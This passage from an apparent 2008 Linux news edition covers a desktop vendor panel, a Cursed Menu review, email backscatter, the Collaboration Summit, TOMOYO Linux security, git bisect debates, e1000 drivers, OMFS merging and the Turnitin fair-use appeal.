components are found in a number of small Linux systems, including the Eee
PC, so Via is happy.

It's too early for real results from Zonbu, which is
trying to use Linux-based systems for a "computers as a service" business
model.  But, says Zonbu, Linux is the best platform for companies trying
new models.  Finally, Xandros also is optimistic, especially about "new
form factors" for the desktop, a place where Microsoft, they say,
"stumbled."


The panel was asked what the development community can do to help these
desktop businesses; in response, Arjan van de Ven piped up from the
audience, asking what the companies are doing for the kernel community.
From Lenovo, the word is that developers can work to get drivers into
enterprise distributions as soon as possible.  That request, of course,
gets back to the tension
between enterprise distributions and the desire for current code; this
subject was not pursued further here, though.  Dell would like to see more 
collaboration with other vendors in the production of drivers.  The Via
representative came straight out and said that "we don't do much" to
support the community, but insisted that their intentions are good.  He
said that community support is hard for a Taiwanese company to do, but
didn't say why.  Via does plan to open a community site at linux.via.com.tw with driver code and
more, but this site is not yet in place.


[PULL QUOTE: 
There would appear to
be some tension between providing a truly open device and
keeping support costs down.
 END QUOTE]


Support of users came up briefly.  The HP representative said that the
company expects distributors to provide backup support, but the first call
will always go to the vendor of the hardware.  That can be a problem,
especially for the small devices which are seeing so much success at the
moment; a single support call can wipe out any profit on the sale of one of
those systems. Selling "constrained systems" which only do a few things
helps; but, earlier, Mr. Mann had also talked about the difficulty of
installing additional applications on these systems.  There would appear to
be some tension between providing a truly open device and
keeping support costs down.  The word from Asus is
that a system like the Eee PC generates a lot of relatively trivial calls -
things like "how do I search on the web?"  So there is a real need to train
users which has little to do with Linux itself.


On the subject of applications, the gOS representative discussed a strategy
of putting as much as possible on the web.  The problem with local
applications which look like Microsoft products is that users then expect
those applications to behave like Microsoft products.  It is better to have
something which is obviously different and, presumably, better.  Xandros
called for better style guides and consistency throughout the interface;
clones of other products are not what the market needs.  On the HP side,
the biggest request was "don't make people open a terminal."  


Perhaps the most amusing comment came from the Via representative, who
described a "Maddog/Shuttleworth" choice.  He asserted that his
grandparents would find Jon "maddog" Hall (who was in the audience) to be a
rather scary presence, while Mark Shuttleworth comes across as a friendly
gentleman.  Our interfaces, he says, need to look more like Mark
Shuttleworth.  Your editor, who has always found Maddog to be one of the
friendliest people he knows, does not entirely buy into this analogy.  But
perhaps there is something to be said for clean-shaven interfaces.


There was some talk of asking suppliers to provide hardware which is
supported by free software.  Perhaps the most telling comment came from
Lenovo, which, apparently, has been asking for Linux-supported hardware
"for a number of years."  Free drivers are not a priority, though; the
first priority is just having things work.  So there is still some work to
be done in this direction.


Arguably the most interesting theme which came from this discussion - and
from the first day of the summit as a whole - is that nobody is really
pushing all that hard to get Linux into traditional desktop settings.  The
real action at the moment would appear to be in small devices like the Eee
PC.  These "greenfield" areas where there is no established presence to
compete against offer vendors a market where they are not trying to migrate
users away from other products.  They would appear to be convinced that
Linux can be a strong contender there - maybe the strongest.  So soon we
may truly see the year of the Linux desktop - for specific types of
"desktop."

		Design simple menus with Cursed Menu


The Cursed Menu
project implements a terminal-based menu system via the the

Curses terminal control library:


Cursed Menu aims to create an ncurses based menu system for character based sessions. This menu program could be used to create user, system administration, or utility menus for clients connecting with text based clients such as telnet, ssh, or rlogin.


Version 1.0.3 of Cursed Menu was recently

announced.  Despite being unable to find any documentation whatsoever
on the project page, your editor decided to try out the software.
The code was

downloaded as a tar.bz2 file, uncompressed and untared.
The configure script was run on a system running Ubuntu 7.04.
There was one dependency issue that was fairly easily solved by
installing the libncurses5-dev package.  After fixing that, the
software configured and made correctly.


The next logical action was to take a look at
the source code in the src/ subdirectory.  The source files were mostly
.cc and .hh indicating a C++ project.  The cursedmenu binary was run and
a blue curses screen similar to the example

screenshot showed up.  Navigating through the menus was simply
a matter of using the arrow keys for movement and the Enter key for
selecting an item.  A longer description of the item under the cursor
showed up on the lower left corner of the terminal screen.


A little more digging through the code revealed the configuration
system for Cursed Menu.  Each menu has an associated .cmd file,
here's what the default main menu .cmd file looks like:


Customizing the .cmd file was fairly intuitive, shell commands
were added to the ItemExec lines and ran when the menu item was
selected.  The cursedmenu binary picked up the changes in the .cmd
file without recompilation.


Cursed Menu provides a quick and easy way to control simple shell
scripts and could be useful for many purposes.
The project could really benefit from some basic documentation,
A simple README file with a description of the available commands
would be a good start.  Despite this lack, the code seems to
function nicely and can be put to use as-is.

		Backscatter increase clogs inboxes


Backscatter, also known as blowback, is the result of a spammer forging the
sender address on an email that is sent to a non-existent address.  Many
mail servers do not reject invalid addresses when they receive the email
and instead generate a bounce message sometime later.  The unfortunate
victim, then, is the one whose address was forged as the sender.  Sometimes,
hundreds or thousands of bounce messages can be generated which flood the
inbox of an innocent bystander.


Backscatter seems to be on the rise recently, the LWN inbox has seen a huge
increase in the number of bounces over the last week or so.  There may be
some connection to some Google
domains contributing to the problem, but that cannot explain all of
it.  One basic problem is that many mail servers are generating the bounce
messages after accepting mail for invalid addresses, rather than
rejecting it while the SMTP transaction is still in progress.


When a mail server gets a connection from a sending machine, it gets several
pieces of information about the email in addition to its contents.  Both a
"from" and "to" address are included in this extra information, which is
usually called the envelope, for obvious reasons.  After receiving each
piece of the envelope, a mail server has the opportunity to reject the
message.  Typically this isn't done for valid-looking sender addresses, except in limited
blacklist situations, but it certainly can and should be done when the
recipient address is invalid.


Due to a variety of mail server configuration issues, many mail servers do
not avail themselves of rejecting mail for invalid senders.  Instead, they
defer their decision until sometime later.  Servers that relay mail will
not know whether some of the addresses they relay are valid, while other servers
(qmail for example) separate the SMTP conversation program from the local
delivery program for security reasons and thus do not have that information
available.  Other valid or semi-valid reasons exist, but once the mail has
been accepted, the proper means of indicating a bad address is no longer available.


In the days before spam—remember those?—a mail server could
generally trust that the sender address in the envelope was the real
sender.  So an incorrectly addressed email could be bundled up in a bounce
message and sent to the sender.  If the sender address is valid, it is
very little different than a bounce that is generated by the sender's
machine when the mail gets rejected at SMTP time.  Unfortunately, the
majority of sender addresses these days are forged.


But spammers don't want to use just any forged address, they want to use
something that is valid or appears valid.  Mail servers have gotten better
at testing sender addresses for validity before accepting mail from them.
So, where does an enterprising spammer get a valid email address?  They
pick one at random from their list of "500,000 guaranteed opt-in email
addresses" that they bought from some other miscreant.  They use those
lists to send their spam to as well as using them to choose sender
addresses to use.


As might be guessed, the SpamAssassin
mailing lists have been discussing the problem recently, especially
trying to find ways to reduce the amount received.  SpamAssassin does have
the VBounce
plugin to recognize bounce messages.  By default, it doesn't increase
the score of bounces by much as it is meant to be used with procmail to put
bounces in a 
separate place from spam. 


Another idea floated on the list is to use SPF or DKIM records for a domain.  The
belief is that spammers avoid using those domains because it is likely to
cause their message to be immediately classified as spam.  Anecdotal
evidence seems to indicate that backscatter can be significantly reduced in
this way.


		Notes from the Collaboration Summit


Your editor has certainly attended no shortage of Linux-related
conferences.  Many of those are developer conferences, which are invariably
interesting events.  Others are oriented around marketing or outreach, with
rather more variable results.  The
Linux Foundation's Collaboration Summit, which ran from April 8
to 10, is unique, though, in that it attracts representatives from
throughout the Linux ecosystem.  Developers are not in short supply (though
it seemed like there were fewer than last year), but those developers spend
three days talking with corporate executives, industry analysts, and,
crucially, a number of high-profile users.  This mixture of people creates
a very different dynamic which supports a whole range of interesting
conversations.


One of the first events was the kernel developers' panel, moderated by your
(normally rather immoderate) editor.  Panelists James Bottomley, Matt
Domsch, Dave Jones, Christoph Lameter, Ted Ts'o, Arjan van de Ven, and
Chris Wright discussed a variety of topics ranging from kernel quality
(getting better), code review, development process participation, hardware
support, and more.  Your editor was not able to take notes from the panel;
perhaps the best report which has come up so far can be found in this
InformationWeek article by Charles Babcock.  


IDC analyst Al Gillen spent half an hour going through a bunch of
chart-heavy slides on the future of Linux in the marketplace.  Overall,
things look good, in that a market worth $20 billion in 2007 is
expected to go up to $50 billion in 2011.  There were lots of
associated details which have been reported elsewhere.  One interesting
aspect was watching how the analyst trade copes with "non-paid" Linux
deployments - which, according to Mr. Gillen, is 43% of the total.  There
was talk about how "monetizing" these deployments is a challenge for those
looking to make money in the Linux marketplace.  He expressed surprise at
just how many companies are confident in their ability to support Linux
deployments on their own.  But he also talked about just how important that
non-paid base is for the support of the entire ecosystem.  Non-paid
deployments may be a "challenge" to those who would prefer to be paid, but
their absence would be a rather larger challenge.


There was an echo of this insight when Red Hat CTO Brian Stevens talked.
One of Red Hat's goals, he says, is to give customers the immense value
that goes with a "zero cost to exit" offering.  There is no RHEL lock-in.
To that end, he says, the folks at CentOS have done Red Hat a great favor.
Brian also talked about the difference between the old "selling the
distribution" business model, which gave Red Hat an incentive to put lots
of shiny new things into each release, and the current model, which puts
the focus on continuity instead.  Since Red Hat's customers have already
paid for the next release, Red Hat doesn't need to add lots of cool new
features to encourage them all to upgrade.


He then spent the rest of his talk on the various cool new features the
company is working on, including messaging, realtime
support, and more. 


Marten Mickos, once CEO of MySQL and now a vice president at Sun
Microsystems, gave a talk which was intended to make listeners feel good
about Sun and its plans for free software.  It bothers him, he says, when
people ask whether MySQL will remain committed to Linux; it strikes him as
a demonstration of uncertainty about the future of Linux in general.  That
uncertainty is unnecessary; Linux's future is strong, regardless of what
MySQL does.  But MySQL (and Sun) do
remain committed to Linux as a platform; the era of monolithic computing
platforms is over, and companies have to support customers who will make
their own choices at each level in the stack.  So LAMP as an "architecture
of participation" will remain supported by Sun well into the future.


An industry panel on "the state of Linux" was a useful view into how some
large companies see the platform.  They are all seeing growth in Linux;


Bdale Garbee (representing HP) noted that Linux is "showing up in
everything" that customers are planning.  IBM's Dan Frye said that Linux is
ready for any kind of workload.  Oracle's Wim Coekaerts did note, though,
that Oracle's revenue from Linux, at a mere $2 billion, is "still
lagging."


There was a fair amount of discussion on how to work with the development
community; NetApp's Brian Pawlowski asserted that "money helps."  By that,
he means employing developers to work within the community and advance the
platform.  Bdale noted that HP tries to work "in" the community, not "with"
it.  Dan Frye echoed that thought, saying that it's important to have
people with credibility in the community and to allow them to work inside
the community for long periods of time.  Motorola's Christy Wyatt, instead,
worried that her company still doesn't have the necessary wisdom to work
effectively with the development community; Linux and the mobile industry,
she says, are still relatively new to each other.


Wim related a story from the first kernel summit
wherein an Oracle representative presented a laundry list of desired
features.  That is, he says, not the right way to do things; the community
tends not to react well to wishlists with no development effort behind
them.  Oracle now has a Linux development team which is entirely separate
from the normal product teams; among other things, it has a blanket
approval to contribute the code it develops, avoiding the lengthy and
tiresome internal legal review process.  The company has also adopted a
policy of making projects open from the beginning, getting much-needed
review early in the process.


Other participants noted that working with a company's legal department can
often be the hardest part of community participation.  Dan suggested
bringing in the legal department at the beginning of a project and
keeping them around; sticking with a single counsel who can slowly be
educated in free software ways is also important.  Bdale said that we were
likely to need "legal domain experts" for some time yet, but that the
situation is getting better; most lawyers now have at least some
understanding of how free software licensing works.  A couple of panelists
discussed the legal headaches that come with mixing components with
different licenses; they would certainly like to see fewer licenses going
into the future.


The final session from the first day covered the state of mobile Linux.  It
was about the only contentious panel on a day where the majority of the sessions
were mostly educational in nature.  One area of disagreement was over
security models.  Some platforms (such as ACCESS)
work with a fine-grained 
set of privileges, while Google's Android uses sandboxing and controlled
access to resources determined by asking the user.  The fine-grained
approach is seen by some as an ideal way for carriers to lock down handsets
and exert firm control over what handset owners can do - not the desired
outcome.  On the other hand, 
asking users is seen as insecure; it's not usually too hard to get users to
agree to almost anything.


Perhaps the lowest moment in this panel came when Google's Eric Chu was
asked about participation with the community as opposed to developing
everything as a private fork.  He replied that the Android code was open, it sits
in a repository somewhere.  But there will be no effort to engage with (for
example) the kernel community and merge this code until it is "done."  That
approach runs against what others had been saying since the kernel panel that
morning: one must get code out there as early as possible.  When the
Android developers finally decide that their code is ready, they are likely
to have a nasty surprise when they try to merge it into the kernel and are
told that much of it is unsuitable by design.  Google came off looking
somewhat bad here, but the truth of the matter is that most of the (many)
mobile Linux projects are operating in similar ways.  Getting these
projects to really work with the communities whose code they are using is,
as with many embedded applications, a challenge.  One can hope that the
suggestions given to these projects at the summit will be taken to heart.


That sort of communication is what makes this event worthwhile; it is often
hard for this particular mixture of people to come together in other
contexts.  The Collaboration Summit was heavy on conversation in general,
often to great effect.  One well-known developer commented to your editor
that the Summit had the biggest disparity between the official content and
the "hallway track" that he had ever seen.  The hallway track was good,
with, hopefully, lots of good things to come from it in the coming months.

		TOMOYO Linux and pathname-based security


It takes a certain kind of courage to head down a road when one can plainly
see the unpleasant fate which befell those who went before.  So one might
think that the fate of AppArmor would deter others from following a similar
path.  The developers of TOMOYO
Linux are not easily put off, though.  Despite having a security
subsystem which shares a number of features with AppArmor, these developers
are pushing forward in an attempt to get their code into the mainline.

AppArmor, remember, is a Linux security module which uses pathnames to make
security decisions.  So it is entirely conceivable that two different
security policies could apply to the same file if that file is accessed by
way of two different names.  This approach helps make AppArmor easier to
administer than SELinux, but it has given AppArmor major
problems in the review process for a few reasons:


 There has been strong resistance to the addition of any new security 
     modules at all, to the point that proposals to remove the LSM
     framework altogether have been floated.

 Some security developers see a pathname-based mechanism as being
     fundamentally insecure.  SELinux developers, in particular, have been
     very strongly against pathname-based security.  To these developers,
     security policies should apply directly to objects (or to labels
     attached directly to objects) rather than to names given to objects.

 The current Linux security module hooks, not being developed with
     pathname-based security in mind, do not provide sufficient information to
     the low-level file operation hooks.  So AppArmor had to reconstruct
     pathnames within its security hooks.  The method chosen for this
     reconstruction was, one might say, not universally admired.


If the TOMOYO Linux developers are serious about getting their code into
the mainline, they will need to have answers to these objections.

As it happens, the first two obstructions have mostly gone away.  Casey
Schaufler's persistence finally resulted in the merging of the SMACK
security module for 2.6.25; it is the only such module, other than SELinux,
ever to get into the mainline.  Now that SMACK has paved the way, talk of
removing the LSM framework (which had been strongly vetoed by Linus in any
case) has ended and the next security module should have an easier time of
it.

Linus has also decreed that pathname-based security modules are entirely
acceptable for inclusion into the kernel.  So, while some developers remain
highly skeptical of this approach, their skepticism cannot, on its own, be
used as a reason to keep a pathname-based security module out.
Pathname-based approaches appear to be "secure enough" for a number of
applications, and there are some advantages
to using that approach.

All of the above is moot, though, if the TOMOYO Linux developers are unable
to implement pathname-based access control in a way which passes muster.
The recent TOMOYO Linux patch
took a different approach to this problem: since the LSM hooks do not
provide the needed information, the developers just added a new set of
hooks, outside of LSM, for use by TOMOYO Linux.  And, while they were at
it, they added new hooks at all enforcement points.  This was not a popular
decision, to say the least.  The whole idea behind LSM was to have a single
set of hooks for all security modules; if every module now adds its own set
of hooks, that purpose will have been defeated and the kernel will turn
into a big mess of security hooks.  Duplicating the LSM framework is not
the way to get a security module into the mainline.

So, somehow, the TOMOYO Linux developers will need to implement
pathname-based security in a different way.  The most obvious thing to do
would be to modify the existing hooks to supply the requisite information
(being a pointer to the vfsmount structure).  The problem here is
that, at the point where the LSM hooks are called, that structure is not
available; it is only used at the higher levels of the virtual filesystem
code.  So either some core VFS functions would have to be changed (so the
vfsmount pointer could be passed into them), or a new set of hooks
would need to be placed at a level where that pointer is available.  It appears that the second approach - adding new
hooks in the namespace code - will be taken for the next version of the
patch.


As the TOMOYO Linux developers work through this problem, they are likely
to be closely watched by the (somewhat reduced in number) AppArmor group.
There appears to be a resurgence of interest in getting AppArmor merged, so
we will probably see AppArmor put forward again in the near future.  That
will be even more likely if TOMOYO Linux is able to solve the pathname
problem in a way which survives review and gets into the kernel.

		Bisection divides users and developers


The last couple of years have seen a renewed push within the kernel
community to avoid regressions.  When a patch is found to have broken
something that used to work, a fix must be merged or the offending patch
will be removed from the kernel.  It's a straightforward and logical idea,
but there's one little problem: when a kernel series includes over 12,000
changesets (as 2.6.25 does), how does one find the patch which caused the
problem?  Sometimes it will be obvious, but, for other problems, there are
literally thousands of patches which could be the source of the
regression.  Digging through all of those patches in search of a bug can be
a needle-in-the-haystack sort of proposition.


One of the many nice tools offered by the git source code management system
is called "bisect."  The bisect feature helps the user perform a binary
search through a range of patches until the one containing the bug is
found.  All that is needed is to specify the most recent kernel which is
known to work (2.6.24, say), and the oldest kernel which is broken
(2.6.25-rc9, perhaps), and the bisect feature will check out a version of
the kernel at the midpoint between those two.  Finding that midpoint is
non-trivial, since, in git, the stream of patches is not a simple line.
But that's the sort of task we keep computers around for.  Once the
midpoint kernel has been generated, the person
chasing the bug can build and 
test it, then tell git whether it exhibits the bug or not.  A
kernel at the new midpoint will be produced, and the process continues.
With bisect, the problematic patch can be found in a maximum of a dozen or
so compile-boot-test cycles.


Bisect is not a perfect tool.  If patch submitters are not careful, bisect
can create a broken kernel when it splits a patch series.  The patch which
causes a bug to manifest itself may not be the one which introduced the
bug.  In the worst case, a developer may merge a long series of patches,
finishing with one brief change which enables all the code added
previously; in this case, bisect will find the final patch, which will only
be marginally useful.  If the person reporting the bug is running a
distributor's kernel, it may be hard to get that kernel in a form which is
amenable to the bisection process.  Bisection might require
unacceptable downtime on the only (production) system which is affected by
the bug.  And, of course, the process of checking out, building, booting,
and testing a dozen kernels is not something which one fits into a coffee
break.  It requires a certain determination on the part of the tester and
quite a bit of time.


All of the points above would suggest that requesting a bisection from a
user reporting a bug should be done as a last resort.  In that context, it
is worth looking at the story of a recent bug report which suggests that
some observers, at least, think that kernel developers are relying a little
too heavily on this tool.  An April 9, Mark Lord reported a regression in the networking stack;
after making a couple of guesses, the network developers suggested that the problem be bisected.


Mark replied that he did not have the time to go through a full
bisection, and that he would much rather be provided a list of commits
which might be at fault.  That list was not forthcoming, though; there were
no developers who had an idea of where the problem might be and, as it
turns out, the developer who introduced the bug lives in a time zone which
caused him to miss the discussion.  Mark's response was strong:


	Years ago, Linus suggested that he opposed an in-kernel debugger
	mainly because he preferred that we *think* more about the
	problems, rather than just finding/fixing symptoms.  This 100%
	reliance upon git-bisect is worse than that.  It has people now
	just tossing regressions into the code left and right, knowing that
	they can toss all of the testing back at the poor folks whose
	systems end up not working.


Andrew Morton also worries that developers
resort too quickly to a bisection request rather than working with users as
was once done.  Either that, he says, or developers just ignore the report
from the beginning.


Other developers have answers to these worries, of course.  Kernel
developers often are not in a position to reproduce a reported bug; it may
depend on the specifics of the user's hardware or workload.  So they must
depend on the user to try things and inform them when a change fixes the
problem.  Here's David Miller's view on how
things used to work:


	In fact, this is what Andrew's so-called "back and forth with the
	bug reporter" used to mainly consist of.  Asking the user to try
	this patch or that patch, which most of the time were reverts of
	suspect changes.  Which, surprise surprise, means we were spending
	lots of time bisecting things by hand.
	
	We're able to automate this now and it's not a bad thing.


The other answer that one hears is that the situation now is much
different, with far more users, much more code, and more problems to deal
with.  The old "back and forth" mode was better suited to smaller user
and developer communities; in the current world, things must be done
differently.  David Miller again:


	What people don't get is that this is a situation where the "end
	node principle" applies.  When you have limited resources (here:
	developers) you don't push the bulk of the burden upon them.
	Instead you push things out to the resource you have a lot of, the
	end nodes (here: users), so that the situation actually scales.


There is another aspect of the problem which is spoken about a bit less
frequently: developers must prioritize bug reports and decide which ones to
work on.  Unlike some projects, the kernel does not have anybody serving in
any sort of bug triage role, so, in the absence of a disgruntled and paying
customer, most developers make their own decisions on which problems to try
to solve.  It should not be surprising that problems with the most complete
information are the ones which are most likely to be addressed first.  

A bug report with a bisection that fingers a specific commit is a report
with very good information, one which is generally easy to resolve.  As an
example, consider Mark Lord's report again; he did eventually take the time
(five hours, apparently) 
to bisect the problem and report the
results; the bug was found and fixed almost immediately thereafter -
despite the fact that the responsible developer was still sleeping
on the other side of the planet.


Even less spoken about is the fact that quite a few problems are one-off
occurrences.  Somewhere out there in the world, there is a single user who,
due to a highly uncommon mixture of hardware and software, experiences a
problem which affects (almost) nobody else.  Marginal hardware, out-of-tree
patches, and overclocking only make the problem worse.  Arjan van de Ven's
kernel oops summaries are illustrative in this regard; the
statistics for the 2.6.25-rc kernels show that a half-dozen problems
account for over half of the reports, while the vast majority of oopses
have only a single occurrence.

Kernel developers have learned that this kind of problem report tends to go
away by itself; the affected user finds a way around the issue (or just
gives up) and nobody else ever complains.  One can well argue that trying
to chase down this kind of problem is not a good use of a kernel
developer's time.  The hard part is figuring out which reports are of this
variety.  One relatively straightforward way is to wait until reports from
other users confirm the problem - or until a sufficiently determined user
bisects the problem and provides a commit ID.  In this sense, bisection
serves as a sort of triage mechanism which requires users to perform enough
work to show that the problem is real.


So the developers do have very good reasons for requesting bisections from
users.  That said, there is reason to worry that many users will simply
stop sending in bug reports.  If the only response they can expect is a
bisection request (which they may be in no position to answer), they may
see no point in reporting bugs at all.  Fewer bug reports is not the path
toward more solid kernel releases.  So, as useful as it is, bisection will
have to be a tool of last resort in most cases.  The good news is that the
development community does seem to understand that; bisection remains just
one of the many tools we have for the isolation and solution of problems.

The not-quite-so-good news is that, as Al
Viro and James Morris have pointed out,
the real problem is in the review of code so that fewer bugs are created in
the first place.  That is not a problem which can be solved with
bisection.

		e1000 v. e1000e


Ingo Molnar was recently bitten by a problem which, in one form or
another, may affect a wider range of Linux users after 2.6.26.  Linux
currently has two drivers for Intel's e1000 network adapters, called
"e1000" and "e1000e".  The former driver, being the older of the two,
supports all older, PCI-based e1000 adapters.  There is, shall we say, a
relative shortage of developers who are willing to stand up for the quality
of the code in this driver, but it works and has a lot of users.

The e1000e driver, instead, supports PCI-Express adapters.  It
is a newer driver which is seen as being better written and easier to
maintain.  It is intended that all new hardware will be supported by this
driver, and that, in particular, all PCI-Express hardware will use it.  The
only problem is that a few PCI-Express chipsets were added to the older
e1000 driver before this policy was adopted.  Since the newer driver also
supports those chipsets, there are two drivers (with two completely
different bodies of code) supporting the same hardware.  The e1000
maintainers would like to end this duplication and put the e1000 driver
into a stable maintenance mode.

To that end, earlier this month, it was announced that, 
as of 2.6.26, the PCI IDs corresponding to PCI-Express devices would be
removed from the e1000 driver, and that all users of that affected hardware
need to move over to e1000e.  The e1000 developers had originally tried
to make this move for 2.6.25, but they committed a fundamental faux
pas in the process: they broke Linus's machine.  So that change got
reverted before 2.6.25-rc1 came out.  Instead, now, we have the
announcement that the change is coming in the next cycle (when the e1000e
problems, presumably, will be fixed) and a bit of configuration trickery
has been added; it  causes the e1000 driver to not claim PCI-Express
devices if the e1000e driver has been built into the kernel.

Ingo's problem is that he built the e1000 driver into his kernel, but
ended up with e1000e configured as a module which was never loaded.  That combination leads
to a network adapter which does not work at all, since the built-in driver
no longer claims it.  Ingo, a bit disgruntled at having to spend an hour
tracking down the problem, has suggested that it is a regression which must
be fixed.  The e1000 driver maintainers have resisted doing so, but Linus,
having also been burned, agrees.  So, while
this transition is likely to go ahead as scheduled, 2.6.25 will probably
have a configuration change designed to keep others from falling into a
similar trap.

		OMFS and the value of obscure filesystems


Your editor has never dabbled in filesystems development.  He has a
suspicion, however, that there is a tense moment in every new filesystem
developer's life: when Christoph Hellwig's review shows up in the mailbox.
Christoph's reviews, while not always being pleasant reading, tend to be
right on the money with regard to problems in filesystem implementations -
and problems in new filesystems are common.  Christoph's stamp of approval
is almost required for the merging of a filesystem, so, when the initial
posting of a filesystem is greeted with reviews that read, nearly in their
entirety, "looks good," one would assume that the path into the mainline
would be straightforward.


The story of OMFS, though,
shows that this assumption does not always hold.  Reviewers have only been able to find
the smallest of details to fix, but there is opposition to its merging,
especially from Andrew Morton.  The objection is that this filesystem -
found on devices like the Rio Karma music player and ReplayTV boxes - has a
very small user base.  OMFS developer Bob Copeland, in his initial posting,
suggested that fewer than twenty people might be using it at this time.
New devices with this filesystem are no longer being made, so the chances
of the user base growing significantly are small.

Andrew's objection is that the addition of any new code creates a new
maintenance burden for kernel developers.  Whenever a VFS interface is
changed, all filesystems must be fixed to work with the new API.  So the
addition of a filesystem imposes costs which, he says, should be outweighed
by the benefits that new filesystem brings.  In the case of an obscure
filesystem with a small and (presumably) decreasing user base, says Andrew, it is not
clear that the benefits are sufficient.  He asks:


	Just as a thought exercise: should we merge a small and well-written
	driver which has zero users?


Andrew would rather see OMFS turned into a user-space filesystem using
FUSE.  Chris Mason is also concerned:


	Even though OMFS seems to be using the generic interfaces well,
	there is still a testing burden for every change.  Someone needs to
	try it, report any problems and get them fixed.  Since none of the
	people making the changes is likely to have an OMFS test bed, all
	of that burden will fall on Bob, his users, and anyone who tries to
	compile the module (Andrew).


OMFS supporters note that the code is written well and can serve as an
example for other filesystem authors.  They also note that code with small
user bases is often merged - that, in fact, in some areas, developers have
said they want all code, regardless of how few people are using it.
Running OMFS through FUSE, they say, would be harder for users to set up
and less efficient in operation.  Says
Christoph:


	Moving a simple block based filesystem means it's more complicated,
	less efficient because of the additional context switches and
	harder to use because you need additional userspace packages and
	need to setup fuse.
	
	We made writing block based filesystems trivial in the kernel to
	grow more support for filesystems like this one.


In this case, it looks like Andrew will back down on this one and let the
next version of the OMFS patches into -mm.  From there, if all goes well,
it could make the jump into the mainline, possibly as early as 2.6.27.  But
Andrew is clearly unhappy about that outcome, and may well raise the
question again in the future: is "well written" really sufficient to
justify merging new filesystems into the kernel?

		Turnitin and fair use


The McLean, Va.  High School students whose copyright infringement lawsuit
against iParadigms, LLC and its Turnitin
plagiarism-detection software system was dismissed
on summary judgment on March 11 have  filed a notice of appeal [PDF] to the Fourth Circuit
Court of Appeals.

That was likely a surprise to iParadigms, whose CEO John Barrie confidently
predicted that hell would freeze over before the students would
appeal. Yet, appeal they have. So this story isn't over yet.  
District Court Judge Claude Hilton's  Opinion [PDF] ruled
that Turnitin's use was highly transformative
and hence fair use; that 
is one of the issues that will be appealed, as Robert Vanderhye, the
attorney representing the students pro bono, explained to me in an email
interview: 

What the
judge held, and what we are appealing, are (1) if a minor clicks on to
the Turnitin.com website he/she is bound by the conditions of the
"Agreement" even if it denies the student the ability to enforce his/her
copyright, and (2) as a matter of law the Turnitin use is transformative
so that it is fair use instead of copyright infringement.


With respect to the first, we submit that the Court misinterpreted
Virginia law, and did not apply the controlling Virginia cases that we
cited.


With respect to the second there clearly are facts in dispute.  Among
the facts in dispute are a) does the Turnitin system work to deter
plagiarism, or does it actually encourage plagiarism since it is so
easily avoided by anyone who really wants to plagiarize; b) is the
Turnitin system so insecure that students papers can easily be recovered
by a hacker so as to easily allow theft of the students' works, or for a
criminal to use information contained in student works against them; and
c) how can the Turnitin use be transformative when they will send a
student's work verbatim to someone outside the student's school system
without the student's permission, or even knowledge.   Also, with
respect to the second point, Turnitin violates the FERPA since student
names, schools, and personal information are usually on the student
works; since it violates FERPA as a matter of law the Turnitin system is
against the public interest, and therefore there can be no fair use.


He mentions that there are facts in dispute because a court is  only
supposed to grant summary judgment if the pleadings and supporting
documents, when viewed in the light most favorable to the non-moving party,
show that there is no genuine issue as to any material
fact. Fed. R. Civ. P. 56(c).


The major issues being appealed then are:  Was it error to dismiss this
lawsuit on summary judgment?  Can minors lose  copyright rights, because of
clicking "I agree" to an agreement that their schools compelled them to
agree to?  What about the privacy issues under the Family
Educational Rights and Privacy Act (FERPA)?  But the key question is,
Is this fair use?


iParadigms' point of view, one that the lower court agreed with, is that a
lot of high schools
and universities use this software and rely on it. They find plagiarism
goes down significantly.    Turnitin isn't using the creative parts of the
papers for commercial gain, the judge said;  it's  a system of integrity
checking. And that's a transformative use.  


Similarities between Google Books and Turnitin:

The computer does the copying, not humans.    
Both archive complete copies of the works.  
Neither gets the works directly from the copyright holder. 
Both claim the use is transformative. 


Differences:

The students are  minors.
There are arguably privacy issues with Turnitin.  
The student papers are unpublished works.
The conceivable market harm is distinguishable. 
There is no way students can opt out.  Any author can opt out of Google
Books.
Turnitin represents itself as a system for protecting copyrights.


For that matter, so  is Google
Books, in that it's a kind of digital card catalogue, letting us know where
to find books with information we want. In Perfect 10,
Inc. v. Google, Inc. (the thumbnail photo case, hence another
works-in-a-computer-database fact pattern) the court found that, too, was
transformative and hence fair use.  Judge Hilton notes this finding in his
order on page 13.  The photos had one purpose originally, the court
found, but putting 
them into a database was something not originally intended, and the search
engine "provides a social benefit by incorporating an original work into a
new work, namely, an electronic reference tool."  The purpose is limited
and the works are used only for comparative purposes that provide a social
benefit. He does mention the exception to that, however, in that if there
is a request to see the work a student's paper allegedly seems to have
plagiarized, a teacher can obtain that work to evaluate. Hence the appeal
over archiving by students who don't want their works used that way. If
the students have issues about having to use the system, they should take
it up with the schools, the judge ruled, because that is who is giving
Turnitin authority to do what they are doing with these student papers, and
he thought
the schools had the right. As for fair use, Judge Hilton found that this
was a transformative use, and he
quoted a definition of transformative from  a case,  Harper &amp;
Row Publishers, Inc. v. Nation Enterprises,   to mean that it "adds
something new, with
a further purpose or different character".  If use is transformative, he
wrote,
it's "strong evidence" that the use is fair use.
 iParadigms has on its website a
legal
opinion [PDF]  it commissioned from Foley &amp; Lardner.
Fair use is a bit hard to pin down. Even the legal opinion notes that fair
use is very much dependent on the facts of each
situation:

Determining whether a copyright exists in a particular work or is infringed
by a particular use of the work is difficult.  The analysis is so
fact-specific that relatively minor variations between the  facts of
superficially similar cases often lead to diametrically different
conclusions.


To grasp  the students' point of view,  imagine if a company  decided to
offer a service to check for infringed code, so it collected all  the
world's proprietary software it could get its hands on, without permission
from the original authors.  Say it got copies from the world's libraries.
And there was no way to opt out. 

Now, imagine that if  the software thought it found a match, you could
request to see the proprietary code that it was thought to infringe.  Do
you think the proprietary software companies or the authors of that code
would view that as a transformative fair use?   
 The crux of the students' issue, then,  is the archiving.  They don't want
their papers to remain in the system, even if they must submit them for
originality review. It bothers them that iParadigms archives the students'
manuscripts and then uses them for profit, while they, the students, lose
control over their own work without getting any compensation.  The students
have their own website,  Don'tTurnItIn.com,  and they have some
additional  court filings available there.
 

A lot of commentary so far has cited
 Judge  Hilton's ruling, because of its fair use arguments, viewing the
opinion as perhaps being helpful to Google in the  litigation brought against it by the Author's
Guild and others regarding   Google
Books, and I'm sure you can see why.  But there are significant
differences too.


Some  have argued that copyright law is out of date  in a digital world,
the Internet being nothing but one huge copying machine. Computers copy,
and so some suggest it would be more logical and less damaging to penalize
wrongful distribution, not copying.  In that sense, the judge's ruling was
quite progressive.   Indeed, it's hard to read his opinion without
concluding that to Judge Hilton, copying by a computer isn't a problem, so
long as human eyes are not involved,  the use is transformative, and there
